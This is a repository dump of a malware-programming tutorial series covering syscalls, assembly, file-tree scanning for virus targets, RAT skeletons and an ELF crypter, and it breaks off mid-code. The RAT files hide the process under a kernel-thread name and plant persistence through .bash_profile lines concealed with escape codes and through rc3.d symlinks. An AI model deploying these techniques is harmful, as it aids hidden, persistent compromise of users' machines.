├── code ├── 11 │ └── rat0x0-04.c ├── 12 │ └── rat0x0-05.c └── 13 │ └── crypter-1.0.c ├── README.md ├── part-02.5.md ├── part-10.md ├── part-11.md ├── part-02.md ├── part-01.md ├── part-08.md ├── part-03.md └── part-07.md /code/11/rat0x0-04.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main (int argc, char *argv[]) { 6 | pid_t pid; 7 | printf ("This is RAT0X0 version 0.1\n"); 8 | 9 | strcpy (argv[0],"[Jbd2/sda0-8]"); 10 | if ((pid = fork()) != 0) return 0; 11 | setsid(); // Remove TTY 12 | if ((pid = fork()) != 0) return 0; 13 | 14 | while (1) usleep (1000); 15 | } 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | **Note that this repository has been archived. Thanks for your interest** 2 | # Programming course for Wannabes 3 | This repo contains the _Programming for Wannabes_ series originally published in 0x00sec.org. I'm just putting this all together to be able to see everything at once. 4 | 5 | 6 | 7 | 8 | * [Programming for Wannabes. Part I. Your first Program](part-01.md) 9 | 10 | Computer architecture introduction. Machine Code introduction. How C relates to asm. 11 | 12 | * [Programming for Wannabes. Part II. Systemcalls](part-02.md) 13 | 14 | Syscall introduction. Using syscalls from C and asm. Stripping down binaries (removing standard libs) 15 | 16 | * [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md) 17 | 18 | Part II for ARM and MIPS 19 | 20 | * [Programming for Wannabes. Part III. Your first Shell Code](part-03.md) 21 | 22 | Processor Native Word Size. HW Memory Models. Pointers. Convert Hello World into a shellcode 23 | 24 | * [Programming for Wannabes. Part IV. The Stack](part-04.md) 25 | 26 | Stacks. Function parameters, prologue and epilogue. Stack Frame. Local variables. Buffer overflows and Canaries concepts 27 | 28 | * [Programming for Wannabes. Part V. A Dropper](part-05.md) 29 | 30 | Writing a dropper (TCP client). Optimize for size. Dropping the dropper hijacking existing raw shell TCP connection (using `ptrace`) 31 | 32 | * [ Programming for Wannabes Part VI. Malware Introduction](part-06.md) 33 | 34 | General introduction to malware. We start writting a generic skeleton to code any kind of malware 35 | 36 | * [ Programming for Wannabes Part VII. Finding Files I](part-07.md) 37 | 38 | How to navigate directories to search for specific files 39 | 40 | * [ Programming for Wannabes Part VIII. Files Details](part-08.md) 41 | 42 | Using stat to get information about files and navigate recursively directories trees 43 | 44 | * [ Programming for Wannabes Part IX. Files Files in asm](part-09.md) 45 | 46 | Recoding part VII but this time in assembler 47 | 48 | * [ Programming for Wannabes Part X. File Details in asm](part-10.md) 49 | 50 | Recoding part VIII but this time in assembler 51 | 52 | * [ Programming for Wannabes Part XI. Introduction to RATs](part-11.md) 53 | 54 | Let's get started coding Remeote Access Trojans. How to disguess RATs on sight 55 | 56 | 57 | * [ Programming for Wannabes Part XII. Persistence](part-12.md) 58 | 59 | Adding persistence to our RAT 60 | 61 | * [ Programming for Wannabes Part XIII. Crypters Part I](part-13.md) 62 | 63 | Everything about crypters. Part I, RC4 algorithm and introduction to ELF format 64 | -------------------------------------------------------------------------------- /code/13/crypter-1.0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include 11 | 12 | #define DIE(s) {perror(s);exit(1);} 13 | #define SWAP(a,b) a += b; b= a -b; a-=b; 14 | 15 | int rc4 (unsigned char *msg, int mlen, unsigned char *key, int klen) { 16 | int i,j; 17 | unsigned char S[256]; // Permutation matrix 18 | 19 | // KSA: Key-Schedulling Algorithm 20 | for (i = 0; i < 255; S[i] = i,i++); 21 | for (j = 0, i = 0; i < 256; i++) { 22 | j = (j + S[i] + key[i % klen] ) % 256; 23 | SWAP(S[i],S[j]); 24 | } 25 | // Encoding 26 | i = j = 0; 27 | int cnt = 0; 28 | while (cnt < mlen) { 29 | i = (i + 1) % 256; 30 | j = (j + S[i]) % 256; 31 | 32 | SWAP(S[i],S[j]); 33 | 34 | msg[cnt] = msg[cnt] ^ S[(S[i] + S[j]) % 256]; 35 | cnt++; 36 | } 37 | printf (" [%d bytes encoded]", cnt); 38 | return 0; 39 | } 40 | 41 | int main (int argc, char *argv[]) { 42 | 43 | if (argc != 2) { 44 | fprintf (stderr, "Invalid number of parameters\n"); 45 | fprintf (stderr, "Usage: crypter binary\n"); 46 | exit (-1); 47 | } 48 | // Open file 49 | int fd; 50 | if ((fd = open (argv[1], O_RDWR, 0)) < 0) DIE ("open"); 51 | // get size 52 | struct stat _st; 53 | if (fstat (fd, &_st) < 0) DIE ("fstat"); 54 | // Map file 55 | unsigned char *p; 56 | if ((p = mmap (0, _st.st_size, PROT_READ | PROT_WRITE, 57 | MAP_SHARED, fd, 0)) == MAP_FAILED) DIE ("mmap"); 58 | // Find code segment 59 | Elf64_Ehdr *elf_hdr = (Elf64_Ehdr*) p; 60 | // Sanity checks oimitted 61 | printf ("Section Table located at : %ld\n", elf_hdr->e_shoff); 62 | printf ("Section Table entry size : %d\n", elf_hdr->e_shentsize); 63 | printf ("Section Table entries : %d\n", elf_hdr->e_shnum); 64 | 65 | int i; 66 | Elf64_Shdr *sh = (Elf64_Shdr*)(p + elf_hdr->e_shoff) ; 67 | //Elf64_Shdr *sh_strtab = sh + elf_hdr->e_shstrndx; 68 | //char *s_name = p + sh_strtab->sh_offset; 69 | char *s_name = p + sh[elf_hdr->e_shstrndx].sh_offset; 70 | 71 | char *key ="0x00Sec!\0"; // Use 8 characters to make asm simpler. 72 | char *name = NULL; 73 | 74 | for (i = 0; i < elf_hdr->e_shnum; i++) { 75 | name = s_name + sh[i].sh_name; 76 | printf ("Section %02d [%20s]: Type: %d Flags: %lx | Off: %lx Size: %lx => ", 77 | i, name, 78 | sh[i].sh_type, sh[i].sh_flags, 79 | sh[i].sh_offset, sh[i].sh_size); 80 | //Find `.text` and `.rodata` 81 | if (!strcmp (name, ".text") || !strcmp (name, ".rodata")) { 82 | // encrypt section 83 | rc4 (p + sh[i].sh_offset, sh[i].sh_size, (unsigned char*)key, strlen (key)); 84 | printf (" - Crypter!\n"); 85 | } else printf ("\n"); 86 | 87 | 88 | } 89 | 90 | // Inject stub here 91 | munmap (p, _st.st_size); 92 | close (fd); 93 | return 0; 94 | } 95 | -------------------------------------------------------------------------------- /code/12/rat0x0-05.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | 10 | int go_to_hell () { 11 | pid_t pid; 12 | 13 | if ((pid = fork()) != 0) return 0; 14 | setsid(); // Remove TTY 15 | if ((pid = fork()) != 0) return 0; 16 | 17 | return 0; 18 | } 19 | 20 | #define USER_PERSISTENCE 0 21 | #define SYS_PERSISTENCE 1 22 | 23 | 24 | int escalate () { 25 | if (getuid () == 0) return SYS_PERSISTENCE; 26 | #if 0 27 | extract_info (); 28 | if (find_exploit ()) { 29 | apply_exploit (); // This will actually run the RAT 30 | exit (1); // so we are done 31 | } 32 | #endif 33 | return USER_PERSISTENCE; 34 | } 35 | 36 | int append_str (char *fname, char *str) { 37 | int fd = open (fname, O_APPEND | O_WRONLY); 38 | if (fd < 0) perror ("open:"); 39 | if (write (fd, str, strlen (str)) < 0) perror ("write:"); 40 | close (fd); 41 | } 42 | int check_update1 (char *fname) { 43 | unsigned char buffer [1024]; 44 | int i, fd = open (fname, O_RDONLY); 45 | do { 46 | int len = read (fd, buffer, 1024); 47 | for (i = 0; i < len; i++) 48 | if (buffer[i] == '\010') { 49 | printf ("File %s already infected\n", fname); 50 | return 0; 51 | } 52 | 53 | if (len == 0) break; 54 | } while (1); 55 | close (fd); 56 | return 1; 57 | } 58 | unsigned char is_updated (char *fname) { 59 | unsigned char buffer, res = 1; 60 | int fd = open (fname, O_RDONLY); 61 | do { 62 | int len = read (fd, &buffer, 1); 63 | if (len <= 0) break; 64 | if (buffer == '\010') { 65 | printf ("- File %s already infected\n", fname); 66 | res = 0; 67 | break; 68 | } 69 | } while (1); 70 | close (fd); 71 | return res; 72 | } 73 | 74 | 75 | int persistence_user () { 76 | printf ("Applying User Persistence\n"); 77 | // apply user persistence 78 | if (is_updated ("./.bash_profile")) 79 | { 80 | append_str ("./.bash_profile", "echo \"I am some harmless malware\"\n"); 81 | append_str ("./.bash_profile", "#\033[1A\033[2K\033[1A\n"); 82 | append_str ("./.bash_profile", "PATH=$HOME/bin:$PATH\n"); 83 | append_str ("./.bash_profile", "#\033[2K\033[1A\033[2K\010"); 84 | } 85 | return 0; 86 | } 87 | 88 | int create_from_str (char *fname, int runlevel, char *str) { 89 | char target[1024] = "./rcX.d/S99malware"; 90 | int fd = open (fname, O_CREAT | O_WRONLY, 0777); 91 | if (fd < 0) perror ("open:"); 92 | if (write (fd, str, strlen (str)) < 0) perror ("write:"); 93 | close (fd); 94 | target[4] = '0' + runlevel; 95 | symlink (fname, target); 96 | } 97 | 98 | char script[] = 99 | "#!/bin/bash\n" 100 | "echo \"I'm malware\"\n" 101 | "# Doing bad things here"; 102 | 103 | int persistence_root () { 104 | printf ("Applying System Persistence\n"); 105 | create_from_str ("./init.d/malware", 3, script); 106 | // apply root persistence 107 | return 0; 108 | } 109 | 110 | int persistence_root1 () { 111 | printf ("Applying System Persistence\n"); 112 | unsigned char buffer[1024]; 113 | getcwd (buffer, 1024); 114 | strcat (buffer, "/rat0x0-05\0"); 115 | symlink (buffer, "./rc3.d/S99rat0x0"); 116 | printf ("%s\n", buffer); 117 | return 0; 118 | } 119 | 120 | int payload () { 121 | while (1) { 122 | // C2C communication loop 123 | usleep (1000); 124 | } 125 | } 126 | 127 | int main (int argc, char *argv[]) { 128 | int (*persistence[2])() = {persistence_user, persistence_root1}; 129 | 130 | printf ("This is RAT0X0 version 0.2\n"); 131 | // go_to_hell (); 132 | strcpy (argv[0],"[Jbd2/sda0-8]"); 133 | persistence [escalate ()](); 134 | payload (); 135 | } 136 | -------------------------------------------------------------------------------- /part-02.5.md: -------------------------------------------------------------------------------- 1 | # Programming for Wannabes. Part II and a Half 2 | 3 | If you had read [Part II](part-02.md) of this series you may have missed a couple of details. Consider this post as a short addendum to Part II including those details. 4 | 5 | 6 | The first you may have noted is that there was no ARM or MIPS code in there. Actually, the paper was already quite long and, to be honest, I thought it should be straightforward to repeat what we did for the x86 with any of those processors. However, I tried myself for the Lulz and I found some glitches that may be useful to mention. 7 | 8 | So let's go with ARM 9 | 10 | # ARM system calls 11 | Calling a system call from ARM works is, conceptually, done in the same way that in the Intel processors. You have to set a specific register with the number of the system call you want to invoke and then get into kernel mode. 12 | 13 | ARM defines 15 registers, named from `r0` to `r12`. The last 3 have special names and special functions, we will go into the details later in this course. For the time being we will only use the general purpose registers (those `r0` to `r12`). 14 | 15 | So, the system call number goes into `r7`... yes, there is a reason, but it does not really matter now. Then the additional parameters needed by the system call goes into registers `r0` to `r5`. 16 | 17 | With all this information and, taking into consideration that system calls follows the same numbering that the Intel 32bits, we can write our exit function like this: 18 | 19 | ```nasm 20 | .text 21 | .globl _exit 22 | 23 | _exit: mov r7, #1 24 | swi #0 25 | 26 | ``` 27 | 28 | As it happened with the Intel processor, the kernel follows the default processor C ABI. This means that when you call a C function, the first parameter goes int `r0` and when you call a system call the first argument also goes in `r0`. That's why we do not have to do anything to capture the parameter we pass to the `_exit` function from C. 29 | 30 | I will reproduce the C code again, in here for your convenience: 31 | 32 | ```C 33 | #include 34 | 35 | int _start (void) 36 | { 37 | int a = 10; 38 | int b = 20; 39 | 40 | a = a + b; 41 | _exit (a); 42 | } 43 | 44 | ``` 45 | 46 | Now, we can proceed as we did with Intel, but we have to be aware that... `gcc` generates ARM 32bits opcodes and `as`, the assembler generates Thumb opcodes... at least that was what happen with my `gcc` and `as`. Thumb is 16bits long and... well you cannot just mix 16bits and 32bits opcodes directly. So there are two options to solve this problem. 47 | 48 | * **Option 1**. Force 32bits passing the compiler the `-marm` flag 49 | * **Option 2**. Mark the assembler code as a Thumb function, using the `.thumb_func` directive before the declaration of your function. 50 | 51 | I tried both, but in this paper, let's use option 1... I haven't checked all the details for option 2 so I may be saying something stupid :P 52 | 53 | ``` 54 | arm-linux-gnueabi-gcc -static -fPIC -nostartfiles -nodefaultlibs -nostdlib -marm -o c2-3-arm c2-2.c exit_func-arm1.s 55 | ``` 56 | 57 | As you can imagine `exit_func-arm1` is the assembly code for option 1. The one we shown above. 58 | 59 | Now you can test your program in your Android Phone or in any other ARM machine (BeagleBone Black, BananaPi, Olinuxino, RaspberryPi,...)... To check it in your phone take a look to this paper ([Improving your Android Shell](https://0x00sec.org/t/improving-your-android-shell/886) ). 60 | 61 | # MIPS system calls 62 | With MIPS I had a quite tough time. The toolchain for my test router used and old version of binutils and that caused me a lot of problems. 63 | 64 | First one was that I couldn't use the names of the registers but its number. MIPS registers are named in a more complex way: 65 | 66 | 67 | $0 $zero Hard-wired to 0 68 | $1 $at Reserved for pseudo-instructions 69 | $2 - $3 $v0, $v1 Return values from functions 70 | $4 - $7 $a0 - $a3 Arguments to functions - not preserved by subprograms 71 | $8 - $15 $t0 - $t7 Temporary data, not preserved by subprograms 72 | $16 - $23 $s0 - $s7 Saved registers, preserved by subprograms 73 | $24 - $25 $t8 - $t9 More temporary registers, not preserved by subprograms 74 | $26 - $27 $k0 - $k1 Reserved for kernel. Do not use. 75 | $28 $gp Global Area Pointer (base of global data segment) 76 | $29 $sp Stack Pointer 77 | $30 $fp Frame Pointer 78 | $31 $ra Return Address 79 | 80 | (taken from http://www.cs.uwm.edu/classes/cs315/Bacon/Lecture/HTML/ch05s03.html) 81 | 82 | We can see again how the last registers are used for special purposes. As I said, we will come to this in a future instalment. For now, we will just use `$v` and `$a` registers. 83 | 84 | So, how do we invoke a system call on a MIPS processor?. Again, we have to put the system call in a register and go into kernel mode. The register for the system call is `$v0` or `$2` and the instruction to go into kernel mode is `syscall`. 85 | 86 | In my case I found the syscall number, disassembling one of my test programs. Then I found that, at least for `SYS_exit`, this page seems to have the right numbers ( https://w3challs.com/syscalls/?arch=mips_o32 ). 87 | 88 | If I told you that parameters, as stated in the table above, goes into `$aX`, then you should be able to write your exit function... something like this: 89 | 90 | ```nasm 91 | .globl _exit 92 | .text 93 | 94 | _exit: li $2, 4001 95 | syscall 96 | ``` 97 | 98 | Let's go with the glitches I mentioned at the beginning. The first one is that... at least for my toolchain, the first function getting executed is `__start` instead of `_start`. It took me a while to realize that (even when the linker was complaining), those two underscores are difficult to see when it is late night. Therefore, we need to change our C code and change the name of our function from `_start` to `__start`. 99 | 100 | The second one was really frustrating, and I haven't completely understood what the problem is. Apparently, for some reason that I do not know, my toolchain cannot compile static binaries. Any attempt to do that will produce a binary that crashes on my router. I have to do some experimentation, but for the time being this is a mystery. 101 | 102 | So, for MIPS, at least for me, I couldn't go that far as I went for Intel and ARM. Even when the `exit` function gets substituted (actually I changed to name to something not in libc and the function got called properly) by our minimal system call. However, I didn't manage to get completely rid of the libc. 103 | 104 | `$ mips-linux-uclibc-gcc -nostartfiles -o c2-2-mips c2-2-mips.c exit_func_mips.s` 105 | 106 | Even though doesn't look like there is any libc dependency. `nm` only shows an undefined symbol: 107 | 108 | ``` 109 | $ nm n 110 | 00440414 A __bss_start 111 | 00400120 r _DYNAMIC 112 | 00440414 A _edata 113 | 00440414 A _end 114 | 004003c0 T _exit 115 | 00440414 A _fbss 116 | 004403e0 A _fdata 117 | 00400360 T _ftext 118 | 004403f0 A _GLOBAL_OFFSET_TABLE_ 119 | 004483e0 A _gp 120 | U _gp_disp 121 | 004403e0 D __RLD_MAP 122 | 00400360 T __start 123 | ``` 124 | 125 | Anyway, I have found that this stuff becomes tricky with routers, specially if you do not have a toolchain that actually matches your router and also that, many of them run old and very stripped down version of linux that imposes additional constraints in the code. 126 | 127 | Let's finish with some numbers as we did with intel: 128 | 129 | c2-3-arm 320 bytes (ARM version) 130 | c2-2-mips 1.8 Kbytes (MIPS version 131 | 132 | These values are after `stripping` the binaries. Not bad... 133 | 134 | Well, this is it for ARM and MIPS... at least for me and for now :slight_smile: 135 | 136 | # Conclusions 137 | We have done a short journey from the C realm to the kernel border and we have found quite a lot of stuff in between. It is interesting to understand all this... it changes a bit the way you see the programs running in your computer. We use to think that a C program is pretty low level and it is very fast and optimized. We have seen a bit of what it goes into a C program... now, just think about what is in there when using a scripting language... _So many CPU cycles_.... 138 | 139 | In next part we will come back to general programming... maybe... 140 | 141 | * PREVIOUS: [Programming for Wannabes. Part II. Systemcalls](part-02.md) 142 | * NEXT: [Programming for Wannabes. Part III. Your first Shell Code](part-03.md) 143 | -------------------------------------------------------------------------------- /part-10.md: -------------------------------------------------------------------------------- 1 | # Programming for Wanabes X. File details in asm 2 | We have already code to scan a single folder and in this instalment we are going to extend it to scan complete folder trees and also get the details from the files so our malware can decide with file is interesting or not. 3 | 4 | This is going to be pretty short as we already know everything needed to implement this extension. 5 | 6 | # Refresher.... the code so far 7 | In the previous instalment, towards the end I mentioned that using an ascending loop will have some benefits in this specific case so, I will include this modification in the base code. 8 | 9 | You can check it as an exercise. It does exactly the same than the previous version, but counts from zero to the number of bytes returned by `getdents`, instead of decreasing that value until we get to zero. 10 | 11 | This is the code. 12 | 13 | ```nasm 14 | global mfw_select_target 15 | extern mfw_puts 16 | extern mfw_putln 17 | extern mfw_openat 18 | extern mfw_newfstatat 19 | extern mfw_getdents 20 | extern mfw_close 21 | 22 | section .text 23 | 24 | mfw_select_target: 25 | BUF_SIZE EQU 0x400 26 | STAT_SIZE EQU 0x144 27 | FD EQU 0x08 28 | BUF EQU (FD + BUF_SIZE) 29 | ST EQU (BUF + STAT_SIZE) 30 | STE EQU BUF 31 | D_NAME EQU 0x12 32 | D_RECLEN EQU 0x10 33 | ST_MODE EQU 0x18 34 | 35 | ;; Create Stack Frame 36 | push rbp 37 | mov rbp, rsp 38 | sub rsp, STE 39 | 40 | ;; Open Directory 41 | ;; RDI and RSI should be all set 42 | mov rdx, 0q200000 ;O_RDONLY | O_DIRECTORY 43 | call mfw_openat 44 | test al,al 45 | js done1 ; Exit if we cannot open the folder. Likely permission denied error 46 | 47 | mov QWORD [rbp-FD], rax ;Store fd in local var 48 | loop0: 49 | mov rdi, QWORD [rbp-FD] 50 | lea rsi, [rbp-BUF] 51 | mov rdx, BUF_SIZE 52 | call mfw_getdents 53 | 54 | test ax,ax 55 | jz done ; 0 means we are done reading the folder 56 | js loop0 ; <0 means error.... we just try again 57 | 58 | mov r9, rax ; Loop limit 59 | lea r8, [rbp-BUF] ; Points to struct linux_dirent record 60 | xor r14,r14 ; Loop counter = 0 61 | 62 | loop1: 63 | lea rdi, [r8 + r14 + D_NAME] ; Offset to current dirent name 64 | 65 | ;; *********************************************** 66 | ;; All new code goes here 67 | ;; ***************************************************** 68 | ;; For the time being just print file name 69 | mov rdi, rsi 70 | call mfw_putln 71 | 72 | next: 73 | movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov 74 | add r14,rdx 75 | cmp r14, r9 76 | jge loop0 ; If it is zero, get more data 77 | jmp loop1 78 | 79 | done: 80 | ;; Close directory 81 | mov rdi, QWORD [rbp-FD] 82 | call mfw_close 83 | done1: 84 | leave ; Set RSP=RBP and pops RBP 85 | ret 86 | 87 | ``` 88 | 89 | Before continuing, you may have noticed the use of `movzx` instruction. This is new and we haven't talked about it before. This instruction and also it counterpart `movsx` allows us to read a value into a register that is smaller than the target register. Let's check the instruction 90 | 91 | ```nasm 92 | movzx rdx, WORD [r8 + r14 + D_RECLEN] 93 | ``` 94 | 95 | In this case we are moving a memory word (16 bits) into a 64 bits register. The `movZx` instruction will complete the target with zeros while the `movSx` will extend the sign. In this example, the value we want is 2 bytes, but we want to use it on the 64bits register for the arithmetic operations (actually the `edx` will likely be enough, but we would have to use the instruction in any case). 96 | 97 | The difference between this instruction and a single move is that the last will not update the higher word on the register, and we should set the register to zero before copying only the lower 16bits. 98 | 99 | In the same way, if we are dealing with negative numbers... 100 | 101 | # Negative numbers 102 | So far we haven't care much about negative numbers... in a sense, we kind of magically assumed that they just work as it happens on C or any other high level language, however, there is a few things we need to know about number representation and its associated arithmetic. 103 | 104 | Let's start thinking on a single byte (8 bits or 8 ones or zeros). As we know with 8 bits we can represent 256 values (from 0 to 255). That's perfect for natural numbers, but what happens if we need negative numbers?... And we need then, I can already told you that. 105 | 106 | Well, in that case we need to encode the number differently. First thing is to store the sign of the number, and, that will take a bit.... I mean, it cannot take less... at least not without over-complicating the solution. Then if 1 bit is reserved for the sign, we have 7 bits to represent the actual number and that is 128 values. let's print a few of those numbers 107 | 108 | 8 => 0 000 1000 -8 => 1 000 1000 109 | 7 => 0 000 0111 -7 => 1 000 0111 110 | .... 111 | 1 => 0 000 0001 -1 => 1 000 0001 112 | 0 => 0 000 0000 0 => 1 000 0000 113 | 114 | So, we see a few problems with this representation. The first one is that we have two representations for the number zero. That is not convenient as can make computations ambiguous and we are also loosing the opportunity to represent one extra number. 115 | 116 | The second problem of this representation is that multiplication is kind of easy, but addition is kind of a hell. 117 | 118 | Fortunately for us, some smart people long ago come up with a better representation for the negative numbers.... 119 | 120 | # 2-complements 121 | This representation of the numbers also uses the most significant bit to indicate the sign, but the value of the number is encoded in a smarter way. Let's see our table of numbers again and then let's explore the benefits of this representation: 122 | 123 | 8 => 0 000 1000 -8 => 1 110 1000 124 | 7 => 0 000 0111 -7 => 1 111 1001 125 | .... 126 | 2 => 0 000 0010 -2 => 1 111 1110 127 | 1 => 0 000 0001 -1 => 1 111 1111 128 | 0 => 0 000 0000 129 | 130 | As we can see now there is one single representation for zero, that is actually zero (all bits zero). This has a consecuence... zero is somehow a positive number, because the most significant bit is 0 (that is our sign bit). This is why a signed char can take values from -128 to 127 (because the zero is part of the positives) 131 | 132 | In addition to the sign, the rest of the number is constructed counting upward as usual for the positive numbers, and backwards for the negative ones... 133 | 134 | Actually the way to change the sign of a number, or if you prefer, calculate the two's complement is as follows: 135 | 136 | * Invert all bits in the number (this is the so called one's complement) 137 | * Add 1 138 | 139 | Let's use as example the number 5 and let's calculate the two's complement of it, or in other words, let's determine the bit representation of -5. 140 | 141 | Number 5 -> 00000101 142 | NOT(5) -> 11111010 143 | NOT(5) + 1 -> 11111011 144 | 145 | The other big advantage of this representation is that basic arithmetic operation will just work. Just add the 5 and -5 above and it will result in zero. Substraction and multiplication also works out of the box. I won't go further into this topic. The interested reader shall read the [Wikipedia page](https://en.wikipedia.org/wiki/Two%27s_complement#Converting_to_two's_complement_representation), and if you are really into maths and scientific SW you also need to read [this](https://www.itu.dk/~sestoft/bachelor/IEEE754_article.pdf). 146 | 147 | # Back to `movsx` 148 | So, now that we know how a negative number is represented we can come back to the `movSx` where `S` stands for _sign_. This instruction works the same than `movzx` but performing what is know as sign extension. 149 | 150 | Sign extension happens when copying some value of a specific datatype into another value but of a bigger datatype. Imagine you want to copy the value 7 in a byte in memory, into the 32 bits register `EDX`. 151 | 152 | EDX Memory Byte 153 | XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX 00000111 154 | | (mov edx, BYTE [mem] 155 | XXXXXXXX XXXXXXXX XXXXXXXX 00000111 <------+ 156 | 157 | In the diagram above `X` means any value. It may be zero or one. When we move the byte into `EDX` we will just update the less significant byte... Anything else in the register will remind. However, when we use `movzx` we are forcing zeros in all the other bits in the register.... and when using `movsz` we are forcing the sign bit. Let's change the byte memory to some negative value 158 | 159 | EDX Memory Byte 160 | XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX 11111110 (-2) 161 | | (movzx edx, BYTE [mem] 162 | 00000000 00000000 00000000 11111110 <------+ 163 | | (movsx edx, BYTE [mem] 164 | 11111111 11111111 11111111 11111110 <------+ 165 | 166 | In the first case we copy the byte in the lower part of the register (actually `dl`) and then we set everything else to 0. En the second case we set everything else to the sign bit. This way, the result of the first case is 254 while in the second case it is still -2. 167 | 168 | # Calling `statat` 169 | Now we can just write the loop to call `statat` and check the file type. Let's split this in two parts. First the call to `statat` and then the check of the file. 170 | 171 | The first part is pretty straight forward: 172 | 173 | ```nasm 174 | 175 | loop1: 176 | lea rdi, [r8 + r14 + D_NAME] ; Offset to current dirent name 177 | 178 | ;; Skip . and .. names 179 | ;; --------------------------- 180 | cmp WORD [rdi], 0x002e 181 | je next 182 | cmp WORD [rdi], 0x2e2e 183 | jne check_file 184 | cmp BYTE [rdi+2], 0 185 | je next 186 | 187 | ;; Check file type and permissions 188 | check_file: 189 | lea rsi, [rdi] ; Par2 : name 190 | mov rdi, [RBP - FD] ; Par1 : fd 191 | lea rdx, [RBP - ST] ; Par3 : struct stat 192 | xor rcx, rcx ; Par4 : flags 193 | call mfw_newfstatat 194 | 195 | test al,al 196 | js next ; Silently skip this file on error. Likely Permission denied 197 | 198 | ;; ******************************** 199 | ;; Here the code to check the file 200 | ;; ********************************* 201 | run_payload: 202 | ;; For the time being just print file name 203 | mov rdi, rsi 204 | call mfw_putln 205 | 206 | next: 207 | movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov 208 | (...) 209 | ``` 210 | 211 | 212 | The first part of the code just checks the file name and skips it in case it is `.` or '..' in order to avoid infinite loops. The check is done comparing against the ascii values (`0x0023` and `0x002323`) of both strings. For the second case, I first tried to read a `DWORD` to just do a comparison, but it looks like the size of `..` is exactly three and I was getting some randon stuff in the most significant byte... any other way to do the check I thought about just ended in longer code... but let me know in the comments if you found a better way. 213 | 214 | Then we just found the call to `newfstatat`. Nothing special here, we have already used this from C, we just set the second parameter first, because we already have that value in `rdi`, so we just do that assignment fist before overwriting `rdi` and we take advantage of _moving_ data between registers. 215 | 216 | Finally we check if the syscall failed and silently continue in that case. 217 | 218 | # Checking file type 219 | Now we need to check the file type. As we did in C, we are going to look for executable files. Note that this is a basic check and in the real world you may need to do further checks. For instance, a virus will need to check that the file is also an `ELF` binary and not just a bash script... both are executable files but their structures are pretty different. Even when it is possible to infect a `bash` file that is something you do not really need special skills to do. 220 | 221 | This part of the code also performs the recursive call that allows us to scan the whole filesystem tree. 222 | 223 | ```nasm 224 | ;; Check if it is a directory 225 | mov eax, DWORD [rdx + ST_MODE] 226 | and eax, 0q0170000 227 | cmp eax, 0q0040000 228 | jz scan_folder ; If it is a directory... scan recursively 229 | cmp eax, 0q0100000 230 | jnz next ; If it is not a regular file.... skip it 231 | 232 | ;; If we got a regular file then let's check permissions 233 | mov eax, DWORD [rdx + ST_MODE] 234 | and eax, 0q00111 ; Execution permisions 235 | jz next ; If no execution permision set... skip the file 236 | jmp run_payload ; Otherwise run the payload on it 237 | 238 | scan_folder: 239 | ;; Before the recursive call we need to store current state in the stack 240 | ;; File descruptor and getents are already there. We just store the registers 241 | ;; This way, we only use the memory when scanning a subfolder 242 | push r8 ; Current getdents buffer 243 | push r9 ; Number of bytes in getents buffer 244 | push r14 ; Current getendts buffer ofsset 245 | 246 | call mfw_select_target ; RDI and RSI already set to the right parameters 247 | ;; Restore evertything and keep going 248 | pop r14 ; PUSH/POP are 2 bytes long... mov reg, [bp-XX] is 4 249 | pop r9 250 | pop r8 251 | jmp next ; Continue 252 | ``` 253 | 254 | The first thing we do us to get the `st_mode` field from the `struct stat` returned by `newfstatat`. Then we mask the `__S_IFM` value that we have found when developing our C version and then we check if we are looking to a directory or a regular file. If the entry is a directory we jump to `scan_folder` to perform the recursive traversal of the just found subfolder, otherwise we check the permissions and if they don't match we just discard this entry and do on to process the next one. 255 | 256 | When we call ourselves recursively to traverse the subfolders we need to store in the stack the local variables we are holding on registers for efficiency. These are `r8` (the `getents` buffer we are processing), `r9` (the number of bytes in that buffer) and `r14` (the current offset in the buffer of the entry we are processing right now). 257 | 258 | We could declare extra local variables in the stack as we did for the `FD`, but in this case we decided to just push and pop the values just before the `call`. This way, the code is shorter and we only perform that operation (saving to memory) only when it is necessary. Note that a `mov` is principle more efficient (faster) but it produces a bit longer code (4 bytes vs the 2 bytes required by the `push/pop`). 259 | 260 | 261 | # The final code 262 | 263 | As usually, this is the final code of our `select_target` function: 264 | 265 | ```nasm 266 | global mfw_select_target 267 | extern mfw_puts 268 | extern mfw_putln 269 | extern mfw_openat 270 | extern mfw_newfstatat 271 | extern mfw_getdents 272 | extern mfw_close 273 | 274 | section .text 275 | 276 | mfw_select_target: 277 | BUF_SIZE EQU 0x400 278 | STAT_SIZE EQU 0x144 279 | FD EQU 0x08 280 | BUF EQU (FD + BUF_SIZE) 281 | ST EQU (BUF + STAT_SIZE) 282 | STE EQU BUF 283 | D_NAME EQU 0x12 284 | D_RECLEN EQU 0x10 285 | ST_MODE EQU 0x18 286 | 287 | ;; Create Stack Frame 288 | push rbp 289 | mov rbp, rsp 290 | sub rsp, STE 291 | 292 | ;; Open Directory 293 | ;; RDI and RSI should be all set 294 | mov rdx, 0q200000 ;O_RDONLY | O_DIRECTORY 295 | call mfw_openat 296 | test al,al 297 | js done1 ; Exit if we cannot open the folder. Likely permission denied error 298 | 299 | mov QWORD [rbp-FD], rax ;Store fd in local var 300 | loop0: 301 | mov rdi, QWORD [rbp-FD] 302 | lea rsi, [rbp-BUF] 303 | mov rdx, BUF_SIZE 304 | call mfw_getdents 305 | 306 | test ax,ax 307 | jz done ; 0 means we are done reading the folder 308 | js loop0 ; <0 means error.... we just try again 309 | 310 | mov r9, rax ; Loop limit 311 | lea r8, [rbp-BUF] ; Points to struct linux_dirent record 312 | xor r14,r14 ; Loop counter = 0 313 | 314 | loop1: 315 | lea rdi, [r8 + r14 + D_NAME] ; Offset to current dirent name 316 | 317 | ;; Skip . and .. names 318 | ;; --------------------------- 319 | cmp WORD [rdi], 0x002e 320 | je next 321 | cmp WORD [rdi], 0x2e2e 322 | jne check_file 323 | cmp BYTE [rdi+2], 0 324 | je next 325 | 326 | ;; Check file type and permissions 327 | check_file: 328 | 